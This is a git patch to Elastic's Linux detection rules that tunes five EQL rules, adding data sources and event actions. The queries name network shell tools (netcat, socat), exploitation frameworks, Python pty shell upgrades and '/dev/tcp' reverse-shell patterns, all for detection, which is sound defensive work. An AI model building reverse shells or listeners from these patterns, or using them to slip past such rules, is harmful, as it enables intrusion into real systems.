From c537fb9c228a8a3aeaf42b545f7699e60bf5d304 Mon Sep 17 00:00:00 2001 From: Ruben Groenewoud <78494512+Aegrah@users.noreply.github.com> Date: Thu, 7 Mar 2024 10:46:48 +0100 Subject: [PATCH] [Tuning] Linux DR Tuning - Part 7 (#3458) * [Tuning] Linux DR Tuning - Part 7 * Update execution_potential_hack_tool_executed.toml --------- Co-authored-by: Colson Wilhoit <48036388+DefSecSentinel@users.noreply.github.com> --- .../execution_nc_listener_via_rlwrap.toml | 14 +++++------ ...xecution_potential_hack_tool_executed.toml | 17 +++++++------- ..._process_started_from_process_id_file.toml | 21 +++++++++++------ rules/linux/execution_python_tty_shell.toml | 23 ++++++++++++------- ...xecution_shell_via_background_process.toml | 15 ++++++++---- 5 files changed, 56 insertions(+), 34 deletions(-) diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml index a08fcd393..937fb7839 100644 --- a/rules/linux/execution_nc_listener_via_rlwrap.toml +++ b/rules/linux/execution_nc_listener_via_rlwrap.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/10/30" +updated_date = "2024/02/20" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ false_positives = [ """, ] from = "now-9m" -index = ["logs-endpoint.events.*"] +index = ["logs-endpoint.events.*", "endgame-*"] language = "eql" license = "Elastic License v2" name = "Netcat Listener Established via rlwrap" @@ -59,15 +59,15 @@ tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", - "Data Source: Elastic Defend" + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" ] timestamp_override = "event.ingested" type = "eql" query = ''' -process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and -process.name == "rlwrap" and process.args in ( - "nc", "ncat", "netcat", "nc.openbsd", "socat" -) and process.args : "*l*" and process.args_count >= 4 +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name == "rlwrap" and process.args in ("nc", "ncat", "netcat", "nc.openbsd", "socat") and +process.args : "*l*" and process.args_count >= 4 ''' [[rule.threat]] diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml index 7d116f4cd..04a496659 100644 --- a/rules/linux/execution_potential_hack_tool_executed.toml +++ b/rules/linux/execution_potential_hack_tool_executed.toml @@ -1,8 +1,8 @@ [metadata] creation_date = "2023/09/22" -integration = ["endpoint"] +integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2023/10/30" +updated_date = "2024/02/20" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -14,7 +14,7 @@ this rule should be investigated further, as hack tools are commonly used by blu well. """ from = "now-9m" -index = ["logs-endpoint.events.*", "endgame-*"] +index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_manager.auditd-*"] language = "eql" license = "Elastic License v2" name = "Potential Linux Hack Tool Launched" @@ -49,17 +49,19 @@ For more details on Elastic Defend refer to the [helper guide](https://www.elast """ severity = "medium" timestamp_override = "event.ingested" -tags = ["Domain: Endpoint", +tags = [ + "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", - "Data Source: Elastic Defend" + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" ] type = "eql" query = ''' -process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and -process.name in ( +process where host.os.type == "linux" and event.action in ("exec", "exec_event", "executed", "process_started") and +event.type == "start" and process.name in ( // exploitation frameworks "crackmapexec", "msfconsole", "msfvenom", "sliver-client", "sliver-server", "havoc", // network scanners (nmap left out to reduce noise) @@ -84,4 +86,3 @@ framework = "MITRE ATT&CK" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index c70c71ee0..0811a8e8f 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -1,10 +1,10 @@ [metadata] creation_date = "2022/05/11" -integration = ["endpoint"] +integration = ["endpoint", "auditd_manager"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/11/02" +updated_date = "2024/02/20" [rule] author = ["Elastic"] @@ -21,7 +21,7 @@ false_positives = [ """, ] from = "now-9m" -index = ["logs-endpoint.events.*", "endgame-*"] +index = ["logs-endpoint.events.*", "endgame-*", "auditbeat-*", "logs-auditd_manager.auditd-*"] language = "eql" license = "Elastic License v2" name = "Process Started from Process ID (PID) File" @@ -69,7 +69,16 @@ For more details on Elastic Defend refer to the [helper guide](https://www.elast """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Threat: BPFDoor", "Data Source: Elastic Endgame", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ] timestamp_override = "event.ingested" type = "eql" @@ -78,17 +87,15 @@ process where host.os.type == "linux" and event.type == "start" and user.id == " process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)""" ''' - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml index b6129d5f6..243bf6daa 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/15" integration = ["endpoint"] maturity = "production" -updated_date = "2023/11/02" +updated_date = "2024/02/20" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -47,11 +47,18 @@ For more details on Elastic Defend refer to the [helper guide](https://www.elast """ severity = "high" timestamp_override = "event.ingested" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ] type = "eql" query = ''' -process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and ( (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.parent.args_count >= 3 and process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or @@ -60,18 +67,18 @@ process where host.os.type == "linux" and event.action in ("exec", "exec_event") ) ''' - [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] - id = "T1059.006" - name = "Python" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml index 66e4580b3..c56a6b593 100644 --- a/rules/linux/execution_shell_via_background_process.toml +++ b/rules/linux/execution_shell_via_background_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/11/02" +updated_date = "2024/02/20" [rule] author = ["Elastic"] @@ -13,7 +13,7 @@ Monitors for the execution of background processes with process arguments capabl channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. """ from = "now-9m" -index = ["logs-endpoint.events.*"] +index = ["logs-endpoint.events.*", "endgame-*"] language = "eql" license = "Elastic License v2" name = "Potential Reverse Shell via Background Process" @@ -47,10 +47,17 @@ For more details on Elastic Defend refer to the [helper guide](https://www.elast """ severity = "medium" timestamp_override = "event.ingested" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ] type = "eql" query = ''' -process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and process.name in ("setsid", "nohup") and process.args : "*/dev/tcp/*0>&1*" and process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") '''